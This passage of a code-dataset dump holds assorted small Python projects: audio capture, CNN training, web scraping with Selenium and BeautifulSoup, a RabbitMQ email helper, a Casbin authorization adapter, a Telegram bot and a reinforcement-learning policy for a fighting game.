self.plot_up, init_func = self.plot_ini,\n frames = 1, interval = 30, blit = False)\n#Sound Recording and Microphone init\n def rec(self):\n self.p = pyaudio.PyAudio()\n self.q = Queue.Queue()\n\n def callBack(self,in_data, frame_count, time_info, status):\n self.q.put(in_data)\n self.audioRec.set()\n return(None,pyaudio.paContinue)\n\n def recStart(self):\n self.stream = self.p.open(format = self.FORMAT, channels = self.CHANNELS, rate = self.RATE,\n input = True, output = False, frames_per_buffer = self.CHUNK,\n stream_callback = self.callBack)\n self.stream.start_stream()\n#Main processing\n def threaded_recording(self): \n while self.stream.is_active():\n self.audioRec.wait(timeout=1000)\n if not self.q.empty():\n self.data = self.q.get()\n while not self.q.empty():\n self.q.get()\n self.real_time_data = np.frombuffer(self.data,np.dtype(' 127, 0, 1)\r\n return img, label\r\n\r\n## Call the function process path to get img and label from the glob of directory\r\n## Autotune = based on your cpu or gpu performance\r\ntrain_ds = train_ds.map(process_path, num_parallel_calls=AUTOTUNE)\r\nval_ds = val_ds.map(process_path, num_parallel_calls=AUTOTUNE)\r\n\r\n## This function created for increasing the performance when call the img and label for futher operation\r\ndef configure_for_performance(ds):\r\n ds = ds.cache()\r\n ds = ds.shuffle(buffer_size=1000)\r\n ds = ds.batch(batch_size)\r\n ds = ds.prefetch(buffer_size=AUTOTUNE)\r\n return ds\r\n\r\n## Call the performance function and separate image and label on both training dataset and validation dataset\r\ntrain_ds = configure_for_performance(train_ds)\r\nval_ds = configure_for_performance(val_ds)\r\ntrain_images, train_labels = next(iter(train_ds))\r\nval_images, val_labels = next(iter(val_ds))\r\n\r\n## Creating Convolutional Neural Network Model\r\nmodel = models.Sequential()\r\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 1)))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dense(64, activation='relu'))\r\nmodel.add(layers.Dense(20, activation='softmax'))\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n## Training The Model\r\nhistory = model.fit(train_images, train_labels, epochs=10, validation_data=(val_images,val_labels))\r\n\r\n## Evaluating The Model\r\nmodel_loss, model_acc = model.evaluate(train_ds, verbose=2)\r\n\r\n## Predicting the 10 first images from the validation dataset \r\npredictions = model.predict(val_images)\r\n\r\n## Sketch the graph on accuracy of the model\r\nplt.plot(history.history['accuracy'], label='accuracy')\r\nplt.plot(history.history['val_accuracy'], label = 'val_accuracy')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('Accuracy')\r\nplt.ylim([0.5, 1])\r\nplt.legend(loc='lower right')\r\n\r\n## Taking all of the result from prediction to make the graph later\r\ni = 1; result_t = [0 for i in range(len(class_names))]; result_f = [0 for i in range(len(class_names))]\r\nfor i in range(len(predictions)):\r\n if np.argmax(predictions[i]) == val_labels[i]:\r\n result_t[val_labels[i]]+=1\r\n else:\r\n \tresult_f[val_labels[i]]+=1 \r\n\r\n## Creating the graph on how much the model can recognize 20 javanese character\r\nx = np.arange(len(class_names))\r\nwidth = 0.35\r\nfig,ax = plt.subplots()\r\nrects1 = ax.bar(x - 
width/2, result_t, width, label='True')\r\nrects2 = ax.bar(x + width/2, result_f, width, label='False')\r\nax.set_ylabel('Value')\r\nax.set_title('Summary')\r\nax.set_xticks(x, class_names)\r\nax.legend()\r\n\r\nax.bar_label(rects1, padding=3)\r\nax.bar_label(rects2, padding=3)\r\n\r\nfig.tight_layout()\r\nplt.show()\r\n","repo_name":"L200164012/JavaneseCharacterCNN-RT","sub_path":"CNN_JavaneseCharacterSummary.py","file_name":"CNN_JavaneseCharacterSummary.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14253849550","text":"# Number strings and English words \n\ndef solution(s):\n answer = 0\n num_dict = {\"zero\":0, \"one\":1, \"two\":2, \"three\":3, \"four\":4, \"five\":5,\n \"six\":6, \"seven\":7, \"eight\":8, \"nine\":9 }\n \n for k in list(num_dict.keys()):\n if k in s:\n s = s.replace(k, str(num_dict[k]))\n\n return int(s)","repo_name":"woohree/ALGO2ITHM_STUDY","sub_path":"programmers/0207_lv.1_81301_숫자문자열과영단어/yeonggyeong.py","file_name":"yeonggyeong.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"11542152015","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAnalysis of integration setting results\nCreated on Wed Apr 1 14:30:53 2020\n\n@author: Jurriez\n\"\"\"\n\nfrom os import getcwd\nfrom os import chdir\nimport sys \nimport numpy as np\nimport matplotlib.pyplot as pp\n\nsys.path.append('../')\nchdir('../')\nimport DataImport as DI\nimport GeneralFunctions as GF\nimport LazyLib as LL\nimport PlottingFunctions as PF\nchdir('IntegratorAnalysis/')\n\n#%% SETTINGS\n# Draw 3d plots of motion relative to L4 in barycentric frame, needs large time scales to show effects\nbarycentricL4MotionComparison = False;\n\naddendum = \"_5\"\n# Number of cases to be taken into account\nnumcases = 5\n\n\n#%% Data import\nchdir(\"../\")\ncwd = getcwd()\nappend = cwd + \"/Data/\"\n\nprint(\"Start synchronizing data files to folder %s\" % append)\nLL.SyncDataFiles(targetDir = append)\nprint(\"Synchronized data files\")\n\n# x,y,z,vx,vy,vz, R, V = (np.ndarray([]) for i in range(0,8))\n\ndatafolder = cwd + '/Data/IntegratorAnalysis/'\n\nmadevars = False\n\nlist_t, list_x, list_y, list_z = ([] for i in range(0,4))\nlist_Bx, list_By,list_Bz = ([] for i in range(0,3))\nfor i in range( 0 , numcases):\n filename = datafolder + \"propagationHistory_\" + str(i) + addendum + \".dat\"\n \n t, xd, yd, zd, vxd, vyd, vzd, md = DI.ImportPropagationHistory(filename,1, True)\n list_t.append(t)\n list_x.append(xd)\n list_y.append(yd)\n list_z.append(zd)\n \n if madevars == False:\n Bx, By, Bz = (np.NaN*np.zeros((xd.shape[0],1,numcases)) for i in range(0,3))\n Dx,Dy,Dz,DBx, DBy, DBz, DR, DBR = (np.NaN*np.zeros((xd.shape[0],2,numcases)) \n for i in range(0,8))\n madevars = True\n\n list_Bx.append( xd[:,0] - xd[:,1])\n list_By.append( yd[:,0] - yd[:,1])\n list_Bz.append( zd[:,0] - zd[:,1])\n if len(list_t[i]) > len(list_t[0]):\n mask = np.in1d(list_t[i],list_t[0])\n Dx[:,:,i] = list_x[0] - list_x[i][mask,:]\n Dy[:,:,i] = list_y[0] - list_y[i][mask,:]\n Dz[:,:,i] = list_z[0] - list_z[i][mask,:]\n DBx[:,0,i] = list_Bx[0] - list_Bx[i][mask]\n DBy[:,0,i] = list_By[0] - list_By[i][mask]\n DBz[:,0,i] = list_Bz[0] - list_Bz[i][mask]\n else: \n mask = np.in1d(list_t[0],list_t[i])\n Dx[mask,:,i] = list_x[0][mask,:] - list_x[i]\n Dy[mask,:,i] = list_y[0][mask,:] - list_y[i]\n Dz[mask,:,i] = list_z[0][mask,:] - list_z[i]\n DBx[mask,0,i] = list_Bx[0][mask] 
- list_Bx[i]\n DBy[mask,0,i] = list_By[0][mask] - list_By[i]\n DBz[mask,0,i] = list_Bz[0][mask] - list_Bz[i]\n \n DR[:,:,i] = np.sqrt(Dx[:,:,i]**2+Dy[:,:,i]**2+Dz[:,:,i]**2)\n DBR[:,0,i] = np.sqrt(DBx[:,0,i]**2+DBy[:,0,i]**2+DBz[:,0,i]**2)\nt -= t[0]\n\n#%% Plot preparation\n#Dr[Dr == 0] = np.NaN\n\nPF.clearPlots()\n\nbase = float(addendum[1:])\nf1 = np.round(base/4,1)\nf2 = np.round(base/2,1)\nf3 = np.round(base*2,1)\nf4 = np.round(base*4,1)\n\nlegend = [str(base) + \" minute time steps\",\n str(f1) +\" minute time steps\",\n str(f2) + \" minute time steps\",\n str(f3) +\" minute time steps\",\n str(f4) +\" minute time steps\"\n ]\n\nstyles = [None, None, None, None, None]\n\n#%% Do the plotting\n\n# Get proper output folder directory to save figures in\nd = LL.folder_dict[\"NumericalSim\"]\nd = LL.folder_dict_funcs[\"RK4\"]\nLL.CheckDir(d)\n\nmax1 = np.max(DR[np.isfinite(DR)])\nmax2 = np.max(DBR[np.isfinite(DBR)])\n\norder = np.max([np.ceil(np.log10(max1)),np.ceil(np.log10(max2))])\n\nylim = [1e-6, 10**order]\n\nfig, ax = PF.Matrix2DPlot(list_t[0],DR[:,:,1:], title=\"Changes in satellite positions with respect to \"+ addendum[1:]+ \" minute step size\",\n xlabel = 't[days]',ylabel='change [m]', xmod=24*3600,ymod = 1,ylim = ylim,\n savefig = True, figfolder = d, name=\"Changes Satellite Position\" + addendum[1:] + \"m\",\n legendlist = legend[1:], stylelist = styles,\n logScale = True, figsize=(14,8))\n\nfig, ax = PF.Matrix2DPlot(list_t[0],DBR[:,0,1:], title=\"Changes in satellite baselines with respect to \"+ addendum[1:]+ \" minute step size\",\n xlabel = 't[days]',ylabel='change [m]', xmod=24*3600,ymod = 1,ylim = ylim,\n savefig = True, figfolder = d, name=\"Changes Satellite Baseline\" + addendum[1:] + \"m\",\n legendlist = legend[1:], stylelist = styles,\n logScale = True, figsize=(14,8))\n","repo_name":"JaHoff/ThesisPython","sub_path":"Integrator Analysis/RK4 Analysis.py","file_name":"RK4 Analysis.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2009943171","text":"import pika, json\nfrom .models import SentEmail\n\n\ndef send_email(message, channel: pika.adapters.blocking_connection.BlockingChannel, sent_email: SentEmail):\n \"\"\"\n Publish a message to the RabbitMQ message broker using the provided channel.\n\n Args:\n message (dict): A dictionary containing the email message to be sent.\n channel (pika.adapters.blocking_connection.BlockingChannel): A channel to the RabbitMQ message broker.\n sent_email (SentEmail): A SentEmail object that represents the email being sent.\n\n Returns:\n tuple or None: Returns None if the message was successfully published to the broker, otherwise a tuple of\n (error message string, 500).\n \"\"\"\n try:\n channel.basic_publish(\n exchange=\"\",\n routing_key=\"email\",\n body=json.dumps(message),\n properties=pika.BasicProperties(\n delivery_mode=pika.spec.PERSISTENT_DELIVERY_MODE\n ),\n )\n except Exception as err:\n # delete removes entries from many-to-many table relating to recipients\n sent_email.delete()\n print(f\"caught exception while putting message to rabbitMq: {err}\")\n return str(err), 500\n","repo_name":"kirantyefun/email-system-microservice","sub_path":"EmailSystem/emails/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38614494764","text":"import cv2 as cv\r\nimport numpy as 
np\r\nface_cascade=cv.CascadeClassifier('haarcascade_frontalface_default.xml')\r\nimg=cv.imread('lena.png')\r\ngrey=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\r\nfaces=face_cascade.detectMultiScale(grey,1.1,4)\r\nfor (x,y,w,h) in faces:\r\n cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),thickness=2)\r\n\r\ncv.imshow('output',img)\r\ncv.waitKey()\r\ncv.destroyAllWindows()","repo_name":"Madhan13K/opencv_programs","sub_path":"opencv_projects/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2776509943","text":"import numpy as np\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\n\nX = np.loadtxt(\"embeddings\");\n# print(X[0])\nlabels = []\nwith open('labels') as output:\n\tfor line in output:\n\t\tlabels.append(line.split('resource/')[1].strip())\n\ntsne = TSNE(n_components=2, random_state=0)\nY = tsne.fit_transform(X[:3000])\n\nfig, ax = plt.subplots()\nax.scatter(Y[:,0], Y[:,1]);\n\nfor i, txt in enumerate(labels):\n\tif i == 3000:\n\t\tbreak\n\tax.annotate(txt.decode(\"utf-8\"), (Y[i,0], Y[i,1]))\nplt.show()\n","repo_name":"dbpedia/embeddings","sub_path":"gsoc2017-akshay/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"79"} +{"seq_id":"16437529680","text":"#Count letters in the given string and store the counts as dictionary\n\na = 'aabbccdddeeepppsssvvvvggggllllll'\nd = {}\n\nfor letter in a:\n #d_items = d.keys()\n #print([0][0])\n #print(letter)\n if letter in d.keys():\n d[letter] += 1\n else:\n d[letter] = 1\nprint(d)\n\n","repo_name":"vandanagarg/practice_python","sub_path":"learning_python/data_structures/dictionaries/count_letters.py","file_name":"count_letters.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"43694915014","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom fake_useragent import UserAgent\nfrom tqdm import tqdm\nimport time\nimport os\nimport csv\n\nimport personal_info\n\nLOGIN = personal_info.LOGIN\nPASSWORD = personal_info.PASSWORD\n\n'''\n0-5 - A1\n6-10 - A2_minus\n11-20 - A2_main\n21-30 - B1_minus\n31-40 - B1_main\n41-50 - B2_minus\n51-60 - B2_main\n61-70 - C1\n71+ - C2\n'''\n\n\ndef calculate_level(x):\n if x in range(0, 6):\n return 'A1'\n elif x in range(6, 11):\n return 'A2'\n elif x in range(11, 41):\n return 'B1'\n elif x in range(41, 51):\n return 'B2'\n elif x in range(51, 71):\n return 'C1'\n elif x in range(71, 101):\n return 'C2'\n\n\ndef recalculate_level(x):\n if x in range(0, 6):\n return 'A1'\n elif x in range(6, 11):\n return 'A2_minus'\n elif x in range(11, 21):\n return 'A2_main'\n elif x in range(21, 31):\n return 'B1_minus'\n elif x in range(31, 41):\n return 'B1_main'\n elif x in range(41, 51):\n return 'B2_minus'\n elif x in range(51, 61):\n return 'B2_main'\n elif x in range(61, 71):\n return 'C1'\n elif x in range(71, 101):\n return 'C2'\n\n\ndef get_level(folder_path):\n global LOGIN, PASSWORD\n options = Options()\n ua = UserAgent()\n userAgent = ua.random\n options.add_argument(f'user-agent={userAgent}')\n driver = webdriver.Firefox(executable_path=r'/Users/mariabocharova/PycharmProjects/REALEC/firefoxdriver')\n driver.get('https://www.grammarly.com/signin')\n\n insert_email = 
driver.find_element_by_name('email').send_keys(LOGIN)\n continue_btn = driver.find_element_by_xpath(\"//button[@class='base_basic__1qybc base_colorGreen__2AdOl']\").click()\n time.sleep(5)\n\n insert_password = driver.find_element_by_name('password').send_keys(PASSWORD)\n sign_in = driver.find_element_by_xpath(\"//button[@class='base_basic__1qybc base_colorGreen__2AdOl']\").click()\n time.sleep(5)\n\n open_new_file = driver.find_element_by_xpath(\"//div[@data-name='new-doc-add-btn']\").click()\n time.sleep(5)\n\n for path in tqdm(os.listdir(folder_path)):\n with open('grammarly_results.csv', 'a') as csvf:\n writer = csv.writer(csvf, delimiter=',')\n with open(folder_path + '/' + path, 'r') as f:\n text = f.read()\n time.sleep(3)\n insert_text = driver.find_element_by_xpath(\n \"//div[@class='_9c5f1d66-denali-editor-editor ql-editor ql-blank']\").send_keys(text)\n time.sleep(10)\n score = int(driver.find_element_by_xpath(\n \"//div[@class='fhsusol _bec19051-header-performanceScoreFadeIn _48adf116-header-performanceScore']\"\n ).text)\n level = calculate_level(score)\n recalc_level = recalculate_level(score)\n writer.writerow([folder_path.split('/')[-1] + '/' + path, level, recalc_level])\n start_again = driver.find_element_by_xpath(\n '//div[@class=\"_9c5f1d66-denali-editor-editor ql-editor\"]'\n ).clear()\n csvf.close()\n\n\n# the absolute path to the folder\nfolder = '/Users/mariabocharova/PycharmProjects/REALEC/REALEC_texts'\nget_level(folder)\n","repo_name":"soimmary/REALEC","sub_path":"grammarly.py","file_name":"grammarly.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17287405589","text":"import asyncio\n\nfrom aiogram import Bot, Dispatcher\nfrom aiogram.fsm.storage.memory import MemoryStorage\nfrom aiogram.types import BotCommand, BotCommandScopeDefault\n\nimport config\nimport handlers\n\n\nasync def set_commands(bot: Bot):\n commands = [\n BotCommand(command=\"start\", description=\"start\"),\n BotCommand(command=\"stop\", description=\"stop\")\n ]\n await bot.set_my_commands(commands=commands, scope=BotCommandScopeDefault())\n\n\nasync def main():\n bot = Bot(token=config.TOKEN)\n dp = Dispatcher(storage=MemoryStorage())\n dp.include_router(handlers.main_router)\n await set_commands(bot)\n await bot.delete_webhook(drop_pending_updates=True)\n await dp.start_polling(bot, skip_updates=False, polling_manager=handlers.polling_manager)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"dmitrijshero/test_multibot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22467283043","text":"# Phone camera for computer vision\nimport cv2\nimport numpy as np\nurl = 'Your IP address/video'\ncp = cv2.VideoCapture(url)\nwhile (True):\n camera, frame = cp.read()\n if frame is not None:\n cv2.imshow('Frame', frame)\n q = cv2.waitKey(1)\n if q == ord('q'):\n break\n cv2.destroyAllWindows()","repo_name":"CosterBellido/Python-principiantes","sub_path":"Camara de telefono para visión artificial.py","file_name":"Camara de telefono para visión artificial.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12609019387","text":"command = \"\"\r\nstarted = False\r\n\r\nwhile True:\r\n command = input(\"> \").lower()\r\n if 
command == \"start\":\r\n if started:\r\n print(\"Car already started!\")\r\n else:\r\n started = True\r\n print(\"Car has been started\")\r\n elif command == \"stop\":\r\n if started:\r\n print(\"Car has been stopped\")\r\n else:\r\n print(\"Car already stopped!\")\r\n elif command == \"quit\":\r\n break\r\n elif command == \"help\":\r\n print(\"\"\"\r\nstart - for starting the car\r\nstop - for stopping the car\r\nquit - for quiting the program\r\n \"\"\")\r\n else:\r\n print(\"Sorry, invalid input\")","repo_name":"GodPhoenix2003/Random-Python-Stuff","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28611778183","text":"# copy from https://github.com/zhangbailong945/mongoengine_adapter/blob/master/casbin_mongoengine_adapter/adapter.py\nfrom casbin import persist\nfrom mongoengine import Document\nfrom mongoengine.fields import IntField, StringField\nfrom werkzeug.local import LocalProxy\nfrom exlib.flex import current_flex\n\n\nclass CasbinRule(Document):\n '''\n CasbinRule model\n '''\n\n __tablename__ = \"casbin_rule\"\n\n ptype = StringField(required=True, max_length=255)\n v0 = StringField(max_length=255)\n v1 = StringField(max_length=255)\n v2 = StringField(max_length=255)\n v3 = StringField(max_length=255)\n v4 = StringField(max_length=255)\n v5 = StringField(max_length=255)\n v6 = StringField(max_length=255)\n\n meta = {\"abstract\": True}\n\n def __str__(self):\n text = self.ptype\n if self.v0:\n text = text + ', ' + self.v0\n if self.v1:\n text = text + ', ' + self.v1\n if self.v2:\n text = text + ', ' + self.v2\n if self.v3:\n text = text + ', ' + self.v3\n if self.v4:\n text = text + ', ' + self.v4\n if self.v5:\n text = text + ', ' + self.v5\n if self.v6:\n text = text + ', ' + self.v6\n\n return text\n\n def __repr__(self):\n return ''.format(str(self))\n\n\nCurrentCasbinRule = LocalProxy(lambda: current_flex.casbin_rule_cls)\n\n\nclass Adapter(persist.Adapter):\n \"\"\"the interface for Casbin adapters.\"\"\"\n\n def __init__(self):\n \"\"\"\n 请自行连接mongo数据库,以免重复连接, 如:\n connect(dbname, host=host)\n \"\"\"\n pass\n\n def load_policy(self, model):\n '''\n implementing add Interface for casbin \\n\n load all policy rules from mongodb \\n\n '''\n lines = CurrentCasbinRule.objects()\n for line in lines:\n persist.load_policy_line(str(line), model)\n\n def _save_policy_line(self, ptype, rule):\n line = CurrentCasbinRule(ptype=ptype)\n if len(rule) > 0:\n line.v0 = rule[0]\n if len(rule) > 1:\n line.v1 = rule[1]\n if len(rule) > 2:\n line.v2 = rule[2]\n if len(rule) > 3:\n line.v3 = rule[3]\n if len(rule) > 4:\n line.v4 = rule[4]\n if len(rule) > 5:\n line.v5 = rule[5]\n line.save()\n\n def save_policy(self, model):\n '''\n implementing add Interface for casbin \\n\n save the policy in mongodb \\n\n '''\n for sec in [\"p\", \"g\"]:\n if sec not in model.model.keys():\n continue\n for ptype, ast in model.model[sec].items():\n for rule in ast.policy:\n self._save_policy_line(ptype, rule)\n return True\n\n def add_policy(self, sec, ptype, rule):\n \"\"\"add policy rules to mongodb\"\"\"\n self._save_policy_line(ptype, rule)\n\n def remove_policy(self, sec, ptype, rule):\n \"\"\"delete policy rules from mongodb\"\"\"\n if sec in [\"p\", \"g\"]:\n condition = {'ptype': sec}\n data = dict(zip(['v0', 'v1', 'v2', 'v3', 'v4', 'v5'], rule))\n for k in data:\n condition[k] = data[k]\n check = CurrentCasbinRule.objects(**condition)\n if check.count() > 
0:\n CurrentCasbinRule.objects.filter(**condition).delete()\n return True\n else:\n return False\n else:\n return False\n\n def remove_filtered_policy(self, sec, ptype, field_index, *field_values):\n \"\"\"\n delete policy rules for matching filters from mongodb\n \"\"\"\n if sec not in [\"p\", \"g\"]:\n return False\n condition = {'ptype': sec}\n conditions = dict(zip(['v%s' % str(i) for i in range(0, len(field_values))], field_values))\n condition.update(conditions)\n check = CurrentCasbinRule.objects(**condition)\n if check.count() > 0:\n CurrentCasbinRule.objects(**condition).delete()\n return True\n else:\n return False\n","repo_name":"shblhy/flexlib","sub_path":"libs/casbin_mongoengine_adapter.py","file_name":"casbin_mongoengine_adapter.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1687850638","text":"#2 - Collect information on each competition\n\n#The page source is HTML, but when using Beautiful Soup we get JSON-format data that comes as Python dicts\n\n# => Grab the event id (needed to build the results links in the next step)\n# => Grab rankingCategory -> keep the most important ones -> OW / DF / GW / GL / A / B / C / D \n# => Grab disciplines (via the dict keys, as for rankingCategory and id) -> keep Stadium Outdoor / Stadium Indoor\n# => Grab the dates -> useful to keep competitions from the last month\n# => Sort/filter on date / rankingCategory / disciplines\n\ndef reset_index_dataframe(name_dataframe):\n name_dataframe = name_dataframe.reset_index(drop=True)\n \n return name_dataframe\n\n\ndef get_info_on_competition(list_url):\n #Create an empty dataframe\n df_vide = pd.DataFrame()\n for i in list_url:\n def get_content(regex):\n #Get page in html\n req = urllib3.PoolManager()\n res = req.request('GET',i)\n soup = BeautifulSoup(res.data, 'html.parser')\n content = soup.find_all(regex)\n \n return content \n \n content = get_content('script') \n \n content = content[1]\n data = content.text\n data_dict = json.loads(data)\n \n #Walk down into the dict\n dict_a = data_dict[\"props\"][\"pageProps\"][\"initialEvents\"]['results']\n \n #Turn the dict into a dataframe\n df1 = pd.DataFrame(dict_a)\n #Append each page's dataframe to the accumulator\n df_vide = pd.concat([df_vide,df1])\n #Reset the index\n df_vide = reset_index_dataframe(df_vide)\n \n return df_vide\n \ndf_competition_info = get_info_on_competition(urls_calendar)\n\n\n#Filter the dataframe to keep the competitions we need\n\n#Get today's date\ndate_aujdh = datetime.date.today()\n#Use yesterday's date: with today's date the results would not be up to date yet\ndate_hier = date_aujdh-datetime.timedelta(days=1)\n#Subtract four weeks (about one month) from yesterday's date\ndate_4weeks_before = date_hier - datetime.timedelta(weeks=4)\n \n#Convert the endDate and startDate columns to date format\ndf_competition_info['endDate'] = pd.to_datetime(df_competition_info['endDate']).dt.date\ndf_competition_info['startDate'] = pd.to_datetime(df_competition_info['startDate']).dt.date\n\n#Filter on endDate to keep the last month\nmask = (df_competition_info['endDate'] > date_4weeks_before) & (df_competition_info['endDate'] <= date_hier)\nfiltered_df = df_competition_info[mask]\n\n\n#Filter on rankingCategory\nfiltered_df = filtered_df.loc[filtered_df['rankingCategory'].isin(['OW','DF','GW','GL','A','B','C','D'])] #the value must match the str 
exactly\n\n#Delete row with NA in column disciplines\nfiltered_df = filtered_df[filtered_df['disciplines'].notna()]\n\ndef filtre_dataframe_str_contains(dataframe,column_name,str_contains):\n dataframe = dataframe[dataframe[column_name].str.contains(str_contains)]\n \n return dataframe\n\n#Filter on disciplines\nfiltered_df = filtre_dataframe_str_contains(filtered_df,'disciplines','Stadium Indoor|Stadium Outdoor') #at least one of the two must be present\n\n#Reset the index\nfiltered_df = reset_index_dataframe(filtered_df)\n\n#Get the id column as a list\nid_list = list(filtered_df['id'])\n","repo_name":"Flojea/Athletics-Performances-Project","sub_path":"2 - Collect informations on each competition.py","file_name":"2 - Collect informations on each competition.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28773213159","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport cv2\nimport sys\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\n\n# In[2]:\n\n\nimg=cv2.imread(sys.argv[1],cv2.IMREAD_COLOR)\n\n\n# In[3]:\n\n\nimg.shape\n\n\n# In[4]:\n\n\ncv2.imshow(\"img\",img)\ncv2.waitKey(1000)\ncv2.destroyAllWindows()\n\n\n# In[5]:\n\n\nfaces = face_cascade.detectMultiScale(img, 1.3, 5)\n\n\n# In[6]:\n\n\ndef getRes(aspect,original):\n if aspect 
STAGES\nSTAGES = [melee.Stage.FINAL_DESTINATION]\n\nclass Policy(nn.Module, Trainer):\n def __init__(self):\n super(Policy, self).__init__()\n self.affine1 = nn.Linear(STATE_DIMENSION, 128)\n self.affine2 = nn.Linear(128, NUM_ACTIONS)\n self.eps = np.finfo(np.float32).eps.item()\n self.saved_log_probs = []\n self.rewards = []\n self.total_rewards = []\n self._verify_and_write_metadata()\n\n def _verify_and_write_metadata(self):\n # Verifies that metadata at this location, if it exists is the same as current metadata. Also writes metadata\n existing_metadata = None\n try:\n with open(MODEL_PATH + '_metadata') as file:\n existing_metadata = file.read()\n except FileNotFoundError:\n pass\n reward_f_serialized = pickle.dumps(PolicyEmulator.calc_reward)\n current_metadata = \\\n f'''\n GAMMA {GAMMA}\n ENEMY_DIFFICULTY_LO {ENEMY_DIFFICULTY_LO}\n ENEMY_DIFFICULTY_HI {ENEMY_DIFFICULTY_HI}\n STAGES {[x.name for x in STAGES]}\n ACTION_SPACE {[x.name for x in list(Action)]}\n REWARD_FUNCTION_SERIALIZED {reward_f_serialized}\n '''\n if existing_metadata:\n assert existing_metadata == current_metadata, \"There exists a model with the same name with different metadata. Rename this model\"\n with open(MODEL_PATH + '_metadata', 'w') as file:\n file.write(current_metadata)\n\n\n def forward(self, x):\n x = self.affine1(x)\n action_scores = self.affine2(x)\n return F.softmax(action_scores, dim=1)\n\n def get_action(self, state):\n state = torch.from_numpy(state.to_np_ndarray()).float().unsqueeze(0)\n probs = self(state)\n m = Categorical(probs)\n action = m.sample()\n self.saved_log_probs.append(m.log_prob(action))\n chosen_action = list(Action)[action.item()]\n return chosen_action\n\n def finish_episode(self):\n R = 0\n policy_loss = []\n returns = []\n for r in self.rewards[::-1]:\n R = r + GAMMA * R\n returns.insert(0, R)\n returns = torch.tensor(returns)\n returns = (returns - returns.mean()) / (returns.std() + self.eps)\n for log_prob, R in zip(self.saved_log_probs, returns):\n policy_loss.append(-log_prob * R)\n policy_loss = torch.cat(policy_loss).sum()\n policy_loss.backward()\n del self.rewards[:]\n del self.saved_log_probs[:]\n\n def reward_trainer(self, reward):\n self.rewards.append(reward)\n\n def save_to(self):\n state = {\n 'total_rewards': self.total_rewards,\n 'affine1': self.affine1.state_dict(),\n 'affine2': self.affine2.state_dict(),\n }\n torch.save(state, MODEL_PATH)\n\n def load_from(self):\n try:\n state = torch.load(MODEL_PATH)\n self.total_rewards = state['total_rewards']\n self.affine1.load_state_dict(state['affine1'])\n self.affine2.load_state_dict(state['affine2'])\n except FileNotFoundError:\n pass\n\n def start_train(self):\n self.load_from()\n running_reward = None\n while True:\n difficulty = random.randint(ENEMY_DIFFICULTY_LO, ENEMY_DIFFICULTY_HI)\n stage_choice = STAGES[random.randint(0, len(STAGES) - 1)]\n emulator = PolicyEmulator(self, difficulty, [stage_choice])\n total_reward, did_ai_win, episode_leng = emulator.game_loop()\n if not running_reward:\n running_reward = total_reward\n running_reward = 0.05 * total_reward + (1 - 0.05) * running_reward\n self.finish_episode()\n self.total_rewards.append(total_reward)\n print('Episode {}\\tLast reward: {:.2f}\\tAverage reward: {:.2f}'.format(\n len(self.total_rewards), total_reward, running_reward), flush=True)\n with open(MODEL_PATH + '_reward.csv', 'a') as f:\n if len(self.total_rewards) == 1:\n f.write('episode_num,total_reward,did_ai_win,episode_length,enemy_difficulty,stage')\n 
